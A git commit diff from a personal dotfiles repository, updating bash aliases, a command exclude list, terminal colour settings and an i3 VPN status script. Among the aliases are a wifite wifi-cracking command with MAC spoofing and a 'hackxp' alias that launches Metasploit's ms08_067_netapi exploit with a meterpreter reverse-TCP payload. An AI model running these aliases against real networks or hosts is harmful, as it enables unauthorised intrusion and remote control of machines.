Browse Source

aliases; nma exclude; updated vpn status

master
Robin Thoni 7 years ago
parent
commit
dfcbf68b71

+ 3
- 1
bash/bash_aliases View File

@@ -31,7 +31,7 @@ alias usbip="sudo usbip"
31 31
 alias modprobe="sudo modprobe"
32 32
 alias wifi="sudo rfkill unblock wifi;sudo service wicd start; wicd-curses"
33 33
 alias stopwifi="sudo service wicd stop; rfkill block wifi"
34
-alias wifite="sudo wifite -wept 10000 -wpst 10000"
34
+alias wifite="sudo wifite -wept 10000 -wpst 10000 -wpat 10000 -mac -showb"
35 35
 alias route="sudo route"
36 36
 alias bashrc="vim ~/.bashrc; source ~/.bashrc"
37 37
 alias rc="vim ~/.bashrc; source ~/.bashrc"
@@ -97,3 +97,5 @@ alias xcopy="xclip -selection clipboard"
97 97
 alias ap="rfkill unblock wifi && sudo create_ap --config /etc/create_ap.conf"
98 98
 alias ns="sudo netstat -ntpa | grep LISTEN"
99 99
 alias hackxp="msfconsole -x 'use exploit/windows/smb/ms08_067_netapi; set payload windows/meterpreter/reverse_tcp; echo set LHOST my_ip; echo set RHOST target_ip'"
100
+alias signal="/usr/bin/chromium-browser --profile-directory=Default --app-id=bikioccmkafdpakkkcpdbppfkghcmihk"
101
+alias slog="tail -f /var/log/syslog"

+ 2
- 0
bash/nma_exclude View File

@@ -10,3 +10,5 @@
10 10
 ^tail
11 11
 ^wifi$
12 12
 ^htop$
13
+^py$
14
+^docker exec

+ 10
- 10
gnome-terminal/gnome-terminal/profiles/Default/%gconf.xml View File

@@ -1,23 +1,23 @@
1 1
 <?xml version="1.0"?>
2 2
 <gconf>
3
-	<entry name="scrollback_unlimited" mtime="1463836092" type="bool" value="true"/>
4
-	<entry name="use_theme_colors" mtime="1463836092" type="bool" value="false"/>
5
-	<entry name="silent_bell" mtime="1463836092" type="bool" value="true"/>
6
-	<entry name="default_show_menubar" mtime="1463836092" type="bool" value="false"/>
7
-	<entry name="palette" mtime="1463836092" type="string">
3
+	<entry name="scrollback_unlimited" mtime="1465727790" type="bool" value="true"/>
4
+	<entry name="use_theme_colors" mtime="1465727790" type="bool" value="false"/>
5
+	<entry name="silent_bell" mtime="1465727790" type="bool" value="true"/>
6
+	<entry name="default_show_menubar" mtime="1465727790" type="bool" value="false"/>
7
+	<entry name="palette" mtime="1465727790" type="string">
8 8
 		<stringvalue>#2E2E34343636:#CCCC00000000:#4E4E9A9A0606:#C4C4A0A00000:#34346565A4A4:#757550507B7B:#060698209A9A:#D3D3D7D7CFCF:#555557575353:#EFEF29292929:#8A8AE2E23434:#FCFCE9E94F4F:#72729F9FCFCF:#ADAD7F7FA8A8:#3434E2E2E2E2:#EEEEEEEEECEC</stringvalue>
9 9
 	</entry>
10
-	<entry name="alternate_screen_scroll" mtime="1463836092" type="bool" value="true"/>
11
-	<entry name="background_color" mtime="1463836092" type="string">
10
+	<entry name="alternate_screen_scroll" mtime="1465727790" type="bool" value="true"/>
11
+	<entry name="background_color" mtime="1465727790" type="string">
12 12
 		<stringvalue>#2E2E34343636</stringvalue>
13 13
 	</entry>
14
-	<entry name="visible_name" mtime="1463836092" type="string">
14
+	<entry name="visible_name" mtime="1465727790" type="string">
15 15
 		<stringvalue>Default</stringvalue>
16 16
 	</entry>
17
-	<entry name="bold_color" mtime="1463836092" type="string">
17
+	<entry name="bold_color" mtime="1465727790" type="string">
18 18
 		<stringvalue>#000000000000</stringvalue>
19 19
 	</entry>
20
-	<entry name="foreground_color" mtime="1463836092" type="string">
20
+	<entry name="foreground_color" mtime="1465727790" type="string">
21 21
 		<stringvalue>#FFFFFFFFFFFF</stringvalue>
22 22
 	</entry>
23 23
 </gconf>

+ 1
- 1
i3/i3/status/status.py View File

@@ -135,7 +135,7 @@ def get_iface_param(iface):
135 135
 
136 136
 ifaces_wireless = ["wlan0", "wlan1"]
137 137
 ifaces_wired = ["eth0", "usb0", "br0"]
138
-ifaces_tun = [["tun0", "rthoni.com"], ["tun1", "inet"],
138
+ifaces_tun = [["tap0", "rthoni.com"], ["tun1", "inet"],
139 139
         ["tun2", "betaclean"]]
140 140
 
141 141
 for iface in ifaces_wireless:

Loading…
Cancel
Save